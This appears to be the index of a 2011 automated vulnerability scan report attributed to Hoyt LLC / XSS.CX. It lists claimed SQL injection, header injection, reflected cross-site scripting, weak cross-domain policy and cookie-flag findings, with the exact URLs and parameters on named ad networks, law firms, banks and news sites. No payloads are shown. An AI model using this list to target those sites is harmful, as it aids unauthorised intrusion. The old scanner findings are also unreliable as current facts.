XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-02

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 12 08:15:19 CDT 2011.

1. SQL injection

1.1. http://da.newstogram.com/hg.php [DMUserTrack cookie]

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

1.3. http://p.addthis.com/pixel [Referer HTTP header]

1.4. http://p.addthis.com/pixel [uid cookie]

1.5. http://www.pomerantzlaw.com/attorneys.html [attorneyID parameter]

1.6. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

1.7. http://www.tuckerellis.com/ [name of an arbitrarily supplied request parameter]

1.8. http://www.tuckerellis.com/tucker-favicon.ico [REST URL parameter 1]

1.9. http://www.tuckerellis.com/tucker-favicon.ico [name of an arbitrarily supplied request parameter]

2. LDAP injection

3. HTTP header injection

3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

3.2. http://akatracking.esearchvision.com/esi/redirect2.html [esvaid parameter]

3.3. http://akatracking.esearchvision.com/esi/redirect2.html [esvcrea parameter]

3.4. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

3.5. http://amch.questionmarket.com/adscgen/sta.php [site parameter]

4. Cross-site scripting (reflected)

4.1. http://207.56.166.97/favicon.ico [REST URL parameter 1]

4.2. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 1]

4.3. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 2]

4.4. http://ad.amtk-media.com/iframe [@CPSC@ parameter]

4.5. http://ad.amtk-media.com/iframe [@CPSC@ parameter]

4.6. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]

4.7. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]

4.8. http://ad.amtk-media.com/iframe [target parameter]

4.9. http://ad.amtk-media.com/iframe [target parameter]

4.10. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]

4.11. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]

4.12. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]

4.13. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]

4.14. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]

4.15. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]

4.16. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]

4.17. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]

4.18. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]

4.19. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]

4.20. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]

4.21. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]

4.22. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]

4.23. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]

4.24. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]

4.25. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]

4.26. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]

4.27. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]

4.28. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]

4.29. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]

4.30. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]

4.31. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]

4.32. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]

4.33. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]

4.34. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]

4.35. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]

4.36. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]

4.37. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]

4.38. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]

4.39. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]

4.40. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]

4.41. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]

4.42. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]

4.43. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]

4.44. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]

4.45. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]

4.46. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]

4.47. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]

4.48. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]

4.49. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]

4.50. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]

4.51. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]

4.52. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]

4.53. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]

4.54. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]

4.55. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]

4.56. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]

4.57. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]

4.58. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]

4.59. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]

4.60. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]

4.61. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]

4.62. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]

4.63. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]

4.64. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]

4.65. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]

4.66. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]

4.67. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]

4.68. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]

4.69. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]

4.70. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]

4.71. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]

4.72. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]

4.73. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]

4.74. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]

4.75. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]

4.76. http://ad.doubleclick.net/adj/fbn [name of an arbitrarily supplied request parameter]

4.77. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.78. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

4.79. http://admeld.adnxs.com/usersync [admeld_callback parameter]

4.80. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

4.81. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

4.82. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.83. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

4.84. http://ads1.revenue.net/j [r_num parameter]

4.85. http://ads1.revenue.net/j [site_id parameter]

4.86. http://adserving.cpxinteractive.com/st [ad_size parameter]

4.87. http://adserving.cpxinteractive.com/st [pop_frequency parameter]

4.88. http://adserving.cpxinteractive.com/st [pop_times parameter]

4.89. http://adserving.cpxinteractive.com/st [section parameter]

4.90. https://ams-legal.net/support/Login.asp [userid parameter]

4.91. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 3]

4.92. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 5]

4.93. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]

4.94. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]

4.95. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]

4.96. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]

4.97. http://da.newstogram.com/hg.php [callback parameter]

4.98. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]

4.99. http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/ [REST URL parameter 2]

4.100. http://dealbook.nytimes.com/category/main-topics/private-equity/ [REST URL parameter 2]

4.101. http://dealbook.nytimes.com/category/main-topics/venture-capital/ [REST URL parameter 2]

4.102. http://ds.addthis.com/red/psi/sites/www.csscorp.com/p.json [callback parameter]

4.103. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]

4.104. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]

4.105. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]

4.106. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]

4.107. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpjs parameter]

4.108. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]

4.109. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]

4.110. http://js.revsci.net/gateway/gw.js [csid parameter]

4.111. http://kona40.kontera.com/KonaGet.js [l parameter]

4.112. http://kona40.kontera.com/KonaGet.js [rId parameter]

4.113. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

4.114. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

4.115. http://r.turn.com/server/pixel.htm [fpid parameter]

4.116. http://r.turn.com/server/pixel.htm [sp parameter]

4.117. http://video.foxbusiness.com/v/feed/video/4674822.js [callback parameter]

4.118. http://wd.sharethis.com/api/getCount2.php [cb parameter]

4.119. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]

4.120. http://wd.sharethis.com/api/getCount2.php [url parameter]

4.121. http://webezines.kwithost.com/sx25Feed.php [callback parameter]

4.122. http://wolfgreenfield.com/favicon.ico [REST URL parameter 1]

4.123. http://wolfgreenfield.com/v_arrow.gif [REST URL parameter 1]

4.124. http://wolfgreenfield.com/v_arrow.gif [name of an arbitrarily supplied request parameter]

4.125. http://www.bloomberg.com/apps/data [sgid parameter]

4.126. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 3]

4.127. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 5]

4.128. http://www.butlerrubin.com/web/br.nsf/index [REST URL parameter 3]

4.129. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 3]

4.130. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 4]

4.131. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 5]

4.132. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 3]

4.133. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 4]

4.134. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 5]

4.135. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 3]

4.136. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 4]

4.137. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 5]

4.138. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 3]

4.139. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 4]

4.140. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 5]

4.141. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 3]

4.142. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 4]

4.143. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 5]

4.144. http://www.hbsr.com/contact_us/index [REST URL parameter 1]

4.145. http://www.hbsr.com/contact_us/index [REST URL parameter 2]

4.146. http://www.hbsr.com/contact_us/index [name of an arbitrarily supplied request parameter]

4.147. http://www.hbsr.com/favicon.ico [REST URL parameter 1]

4.148. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 1]

4.149. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 2]

4.150. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [name of an arbitrarily supplied request parameter]

4.151. http://www.hbsr.com/news_events/index [REST URL parameter 1]

4.152. http://www.hbsr.com/news_events/index [REST URL parameter 2]

4.153. http://www.hbsr.com/news_events/index [name of an arbitrarily supplied request parameter]

4.154. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 1]

4.155. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 2]

4.156. http://www.hbsr.com/practices_technologies/biotechnology [name of an arbitrarily supplied request parameter]

4.157. http://www.hbsr.com/practices_technologies/index [REST URL parameter 1]

4.158. http://www.hbsr.com/practices_technologies/index [REST URL parameter 2]

4.159. http://www.hbsr.com/practices_technologies/index [name of an arbitrarily supplied request parameter]

4.160. http://www.hbsr.com/practices_technologies/software [REST URL parameter 1]

4.161. http://www.hbsr.com/practices_technologies/software [REST URL parameter 2]

4.162. http://www.hbsr.com/practices_technologies/software [name of an arbitrarily supplied request parameter]

4.163. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 1]

4.164. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 2]

4.165. http://www.hbsr.com/practices_technologies/telecommunications [name of an arbitrarily supplied request parameter]

4.166. http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter]

4.167. http://www.pillsburylaw.com/connect_forgotpassword.cfm [p parameter]

4.168. http://www.pillsburylaw.com/index.cfm [name of an arbitrarily supplied request parameter]

4.169. http://www.stroock.com/sitecontent.cfm [contentID parameter]

4.170. http://www.wolfgreenfield.com/favicon.ico [REST URL parameter 1]

4.171. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 1]

4.172. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 2]

4.173. http://www.wolfgreenfield.com/industries_technologies/index [name of an arbitrarily supplied request parameter]

4.174. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 1]

4.175. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 2]

4.176. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [name of an arbitrarily supplied request parameter]

4.177. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 1]

4.178. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 2]

4.179. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 1]

4.180. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 2]

4.181. http://www.wolfgreenfield.com/practices_services/internet-domain-names [name of an arbitrarily supplied request parameter]

4.182. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 1]

4.183. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 2]

4.184. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [name of an arbitrarily supplied request parameter]

4.185. http://adserving.cpxinteractive.com/st [Referer HTTP header]

4.186. http://da.newstogram.com/hg.php [DMUserTrack cookie]

4.187. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.188. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]

4.189. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]

4.190. http://trc.taboolasyndication.com/bloomberg/trc/2/json [taboola_user_id cookie]

4.191. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

5. Flash cross-domain policy

5.1. http://ad.doubleclick.net/crossdomain.xml

5.2. http://ad.us.doubleclick.net/crossdomain.xml

5.3. http://apps.shareholder.com/crossdomain.xml

5.4. http://b.scorecardresearch.com/crossdomain.xml

5.5. http://bs.serving-sys.com/crossdomain.xml

5.6. http://by.optimost.com/crossdomain.xml

5.7. http://ds.serving-sys.com/crossdomain.xml

5.8. http://engine.cmmeglobal.com/crossdomain.xml

5.9. http://feeds.feedburner.com/crossdomain.xml

5.10. http://js.revsci.net/crossdomain.xml

5.11. http://pix04.revsci.net/crossdomain.xml

5.12. http://secure-us.imrworldwide.com/crossdomain.xml

5.13. http://wt.o.nytimes.com/crossdomain.xml

5.14. http://add.my.yahoo.com/crossdomain.xml

5.15. http://dealbook.nytimes.com/crossdomain.xml

5.16. http://googleads.g.doubleclick.net/crossdomain.xml

5.17. http://graphics8.nytimes.com/crossdomain.xml

5.18. http://markets.on.nytimes.com/crossdomain.xml

5.19. http://media.ft.com/crossdomain.xml

5.20. http://pagead2.googlesyndication.com/crossdomain.xml

5.21. http://pubads.g.doubleclick.net/crossdomain.xml

5.22. http://timespeople.nytimes.com/crossdomain.xml

5.23. http://www.facebook.com/crossdomain.xml

5.24. http://www.ft.com/crossdomain.xml

5.25. http://www.nytimes.com/crossdomain.xml

5.26. http://pillsburylaw.app4.hubspot.com/crossdomain.xml

5.27. http://stats.ft.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad.us.doubleclick.net/clientaccesspolicy.xml

6.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.4. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://secniche.org:2082/tmp/secniche/webalizer//usage_201105.html

7.2. http://www.digiware.net/

7.3. http://www.huroncapital.com/secure/

7.4. http://www.pillsburylaw.com/

7.5. http://www.pillsburylaw.com/index.cfm

7.6. http://www.privateequityinfo.com/

7.7. http://www.privateequityinfo.com/forgotpassword.php

7.8. http://www.privateequityinfo.com/product_details.php

7.9. http://www.soundpatheview.com/

8. SSL cookie without secure flag set

8.1. https://ams-legal.net/support/default.asp

8.2. https://ams-legal.net/tuckerellis/Image.asp

8.3. https://ams-legal.net/tuckerellis/Login.asp

8.4. https://ams-legal.net/tuckerellis/default.asp

8.5. https://ams-legal.net/tuckerellis/default.asp

8.6. https://cle-files.tuckerellis.com/

8.7. https://cle-files.tuckerellis.com/password_reset

8.8. https://cle-files.tuckerellis.com/register

8.9. https://secure.reportingsystem.com/TPG/index.cfm

8.10. https://services.sungarddx.com/Default.aspx

8.11. https://services.sungarddx.com/common/js/AdminFunctions.asp

8.12. https://services.sungarddx.com/js/source.asp

8.13. https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll

8.14. https://ww3.janus.com/advisor/about-janus

8.15. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

8.16. https://personal.vanguard.com/us/funds/snapshot

8.17. https://services.sungarddx.com/default.aspx

8.18. https://virtualoffice.tuckerellis.com/

8.19. https://ww3.janus.com/favicon.ico

8.20. https://www.wellsfargo.com/jump/theprivatebank/index

9. Session token in URL

9.1. http://by.optimost.com/counter/553/-/129/event.js

9.2. http://l.sharethis.com/pview

9.3. http://www.facebook.com/extern/login_status.php

10. Password field submitted using GET method

10.1. https://secure.reportingsystem.com/TPG/index.cfm

10.2. https://secure.reportingsystem.com/carlyle/

10.3. http://www.soundpatheview.com/

11. ASP.NET ViewState without MAC enabled

12. Open redirection

13. Cookie scoped to parent domain

13.1. http://convctr.overture.com/images/cc/cc.gif

13.2. http://foxbusiness.disqus.com/thread.js

13.3. https://personal.vanguard.com/us/funds/snapshot

13.4. http://www.dmoc.com/

13.5. http://www.elawmarketing.com/

13.6. http://www.korteco.com/

13.7. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

13.8. http://ad.amtk-media.com/iframe

13.9. http://ad.doubleclick.net/clk

13.10. http://ad.turn.com/server/ads.js

13.11. http://admeld.adnxs.com/usersync

13.12. http://ads.adbrite.com/adserver/vdi/742697

13.13. http://ads.revsci.net/adserver/ako

13.14. http://ads.revsci.net/adserver/ako

13.15. http://ads.revsci.net/adserver/ako

13.16. http://ads.revsci.net/adserver/ako

13.17. http://ads.revsci.net/adserver/ako

13.18. http://ads.revsci.net/adserver/ako

13.19. http://ads.revsci.net/adserver/ako

13.20. http://ads1.revenue.net/j

13.21. http://ads1.revenue.net/load/227245/index.html

13.22. http://akatracking.esearchvision.com/esi/redirect.html

13.23. http://akatracking.esearchvision.com/esi/redirect2.html

13.24. http://altfarm.mediaplex.com/ad/js/15917-119013-26745-9

13.25. http://amch.questionmarket.com/adsc/d908257/6/911744/decide.php

13.26. http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php

13.27. http://amch.questionmarket.com/adsc/d909615/2/200214693345/decide.php

13.28. http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php

13.29. http://amch.questionmarket.com/adsc/d909615/2/912024/decide.php

13.30. http://amch.questionmarket.com/adsc/d909615/2/912025/decide.php

13.31. http://amch.questionmarket.com/adsc/d909615/2/912026/decide.php

13.32. http://amch.questionmarket.com/adsc/d909615/2/912027/decide.php

13.33. http://b.scorecardresearch.com/b

13.34. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.35. http://cf.addthis.com/red/p.json

13.36. http://core.insightexpressai.com/adServer/adServerESI.aspx

13.37. http://cspix.media6degrees.com/orbserv/hbpix

13.38. http://da.newstogram.com/hg.php

13.39. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json

13.40. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

13.41. http://ib.adnxs.com/ptj

13.42. http://id.google.com/verify/EAAAAMuM38IiZaQMTv0qVSa50bs.gif

13.43. http://id.google.com/verify/EAAAAMvcQqr1NPgfDRpmfjdPxdo.gif

13.44. http://id.google.com/verify/EAAAAOW1EPjB-6m1cfgoaUZgYek.gif

13.45. http://id.google.com/verify/EAAAAPk-aVA72N8UD0L0g156sYY.gif

13.46. http://idpix.media6degrees.com/orbserv/hbpix

13.47. http://js.revsci.net/gateway/gw.js

13.48. http://m1463.ic-live.com/572/

13.49. http://marketing.csscorp.com/acton/bn/1090/visitor.gif

13.50. http://meter-svc.nytimes.com/meter.js

13.51. http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302

13.52. http://odb.outbrain.com/utils/get

13.53. http://odb.outbrain.com/utils/ping.html

13.54. http://overseebroad.d.chango.com/c/t.js

13.55. http://pix04.revsci.net/D08734/a1/0/0/0.gif

13.56. http://pix04.revsci.net/E05510/b3/0/3/1003161/38529734.js

13.57. http://pix04.revsci.net/H07707/b3/0/3/0806180/203086575.js

13.58. http://pix04.revsci.net/H07707/b3/0/3/0806180/215595401.js

13.59. http://pix04.revsci.net/H07707/b3/0/3/0806180/225588936.js

13.60. http://pix04.revsci.net/H07707/b3/0/3/0806180/273184684.js

13.61. http://pix04.revsci.net/H07707/b3/0/3/0806180/293330189.js

13.62. http://pix04.revsci.net/H07707/b3/0/3/0806180/396037982.js

13.63. http://pix04.revsci.net/H07707/b3/0/3/0806180/513736918.js

13.64. http://pix04.revsci.net/H07707/b3/0/3/0806180/551354059.js

13.65. http://pix04.revsci.net/H07707/b3/0/3/0806180/562084143.js

13.66. http://pix04.revsci.net/H07707/b3/0/3/0806180/579814010.js

13.67. http://pix04.revsci.net/H07707/b3/0/3/0806180/590965522.js

13.68. http://pix04.revsci.net/H07707/b3/0/3/0806180/702365539.js

13.69. http://pix04.revsci.net/H07707/b3/0/3/0806180/71896167.js

13.70. http://pix04.revsci.net/H07707/b3/0/3/0806180/747456476.js

13.71. http://pix04.revsci.net/H07707/b3/0/3/0806180/848419951.js

13.72. http://pix04.revsci.net/H07707/b3/0/3/0806180/912026619.js

13.73. http://pix04.revsci.net/H07707/b3/0/3/0806180/949356899.js

13.74. http://pix04.revsci.net/H07707/b3/0/3/0806180/955065746.js

13.75. http://pix04.revsci.net/J07717/b3/0/3/1003161/451564742.js

13.76. http://pix04.revsci.net/K05539/b3/0/3/1003161/248479722.js

13.77. http://pixel.33across.com/ps/

13.78. http://pixel.quantserve.com/pixel

13.79. http://r.turn.com/r/bd

13.80. http://r.turn.com/r/beacon

13.81. http://r.turn.com/server/pixel.htm

13.82. http://segments.adap.tv/data/

13.83. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22

13.84. http://tags.bluekai.com/site/668

13.85. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

13.86. http://track.ft.com/track/track.js

13.87. http://va.px.invitemedia.com/pixel

13.88. http://www.csscorp.com/

13.89. http://www.nytimes.com/adx/bin/adx_remote.html

13.90. https://www.wellsfargo.com/jump/theprivatebank/index

14. Cookie without HttpOnly flag set

14.1. https://ams-legal.net/support/default.asp

14.2. https://ams-legal.net/tuckerellis/Image.asp

14.3. https://ams-legal.net/tuckerellis/Login.asp

14.4. https://ams-legal.net/tuckerellis/default.asp

14.5. https://ams-legal.net/tuckerellis/default.asp

14.6. http://axley.com/

14.7. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/counter.PicCount

14.8. http://cgiwsc.enhancedsitebuilder.com/extras/public/formular.cls/show

14.9. http://convctr.overture.com/images/cc/cc.gif

14.10. http://cpadominator.com/campaigns/index.php

14.11. http://foxbusiness.disqus.com/thread.js

14.12. http://generalatlantic.com/en/team/overview

14.13. http://m1463.ic-live.com/572/

14.14. https://personal.vanguard.com/us/funds/snapshot

14.15. http://privatemoneytalk.com/

14.16. http://revelations.trovus.co.uk/tracker/542.gif

14.17. https://secure.reportingsystem.com/TPG/index.cfm

14.18. https://services.sungarddx.com/common/js/AdminFunctions.asp

14.19. https://services.sungarddx.com/js/source.asp

14.20. http://trc.taboolasyndication.com/bloomberg/trc/2/json

14.21. https://webmail-us.mimecast.com/webMail/login.jsp

14.22. https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll

14.23. https://ww3.janus.com/advisor/about-janus

14.24. http://www.ams-legal.com/

14.25. http://www.apolloic.com/

14.26. http://www.conferenceservers.com/browser/proxy.asp

14.27. http://www.dmoc.com/

14.28. http://www.elawmarketing.com/

14.29. http://www.huroncapital.com/secure/

14.30. http://www.kkr.com/company/landmark_achievements.cfm

14.31. http://www.kkr.com/investor/investor_relations_overview.cfm

14.32. http://www.kkr.com/kpe/private_equity_overview.cfm

14.33. http://www.kkr.com/team/theteam.cfm

14.34. http://www.korteco.com/

14.35. http://www.milbank.com/en

14.36. http://www.pillsburylaw.com/

14.37. http://www.pillsburylaw.com/connect_forgotpassword.cfm

14.38. http://www.pillsburylaw.com/index.cfm

14.39. http://www.pillsburylaw.com/scripts/images/arrows-default.png

14.40. http://www.pomerantzlaw.com/cases.html

14.41. http://www.privateequityinfo.com/

14.42. http://www.privatemoneytalk.com/

14.43. http://www.provequity.com/

14.44. http://www.providenceequitypartners.com/

14.45. http://www.stroock.com/

14.46. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

14.47. http://ad.amtk-media.com/iframe

14.48. http://ad.doubleclick.net/clk

14.49. http://ad.turn.com/server/ads.js

